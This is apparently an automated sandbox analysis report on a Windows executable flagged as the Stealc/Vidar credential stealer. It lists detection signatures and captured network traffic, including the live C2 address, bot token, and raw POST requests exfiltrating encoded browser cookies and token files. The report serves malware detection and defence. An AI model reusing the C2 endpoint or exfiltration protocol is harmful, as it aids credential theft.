Windows Analysis Report
fXg8zgxVTF.exe

Overview

General Information

Sample name: fXg8zgxVTF.exe
Renamed because the original name is a hash value
Original sample name: c7ca98803a76b62a6a379a0b684b162a.exe
Analysis ID: 1541134
MD5: c7ca98803a76b62a6a379a0b684b162a
SHA1: 00de8f4666fe890f9fd3bf2d405cae32f3c2cc78
SHA256: 7fff867271d6f0f7c301e83dad5875e2194dbf2389ac33130b7711db7e6904bd
Tags: 32exe

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: fXg8zgxVTF.exe.3796.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}
Source: fXg8zgxVTF.exe ReversingLabs: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: fXg8zgxVTF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\wrk\umfen\Release\UndeleteMyFilesPro.pdb source: fXg8zgxVTF.exe
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041C243 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator, 0_2_0041C243
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452350 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcpyW,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452350
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043E4B0 lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcpyW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindClose, 0_2_0043E4B0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452640 RegOpenKeyW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrcpyW,lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00452640
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452910 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,RegOpenKeyW,RegEnumKeyW,RegCloseKey,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegQueryValueExW,RegCloseKey,DoEnvironmentSubstW,lstrlenW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452910
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468BA0 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468BA0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468D60 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468D60
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043EEB0 FindFirstFileW,FindClose, 0_2_0043EEB0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468FC0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,GetLastError, 0_2_00468FC0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Malware configuration extractor URLs: 95.182.96.50/2aced82320799c96.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 41 30 41 43 32 38 37 30 35 32 34 35 38 35 30 34 38 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="message"browsers------JKJKKKJJJKJKFHJJJJEC--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="message"plugins------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"fplugins------BGDBAKFCFHCGDGCBAAKF--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 95.182.96.50Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file"------FCAAEBFHJJDAAKFIECGD--
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 95.182.96.50Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="message"wallets------FIEHDBGDHDAECBGDHJKF--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKHost: 95.182.96.50Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="message"files------GHIJJJEGDBFHDHJJDBAK--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file"------CBAKFCBFHJDHJKECAKEH--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 95.182.96.50Content-Length: 115363Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"ybncbhylepme------BKECAEBGHDAEBFHIEGHI--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIIIJDAAAAAAKECBFBAE--
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49714 -> 95.182.96.50:80
Source: unknown TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/)
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB8000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.php
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpData
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpEJpm
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpance
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpbj
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpe5
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpf
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpft
Source: fXg8zgxVTF.exe, 00000000.00000002.2395860797.00000000353D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpi
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpsition:
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpzj
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dll.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/mozglue.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/mozglue.dll.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll4
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllW
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllm
Source: fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dllt
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dllD
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dllr
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB8000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll:SJ
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.500
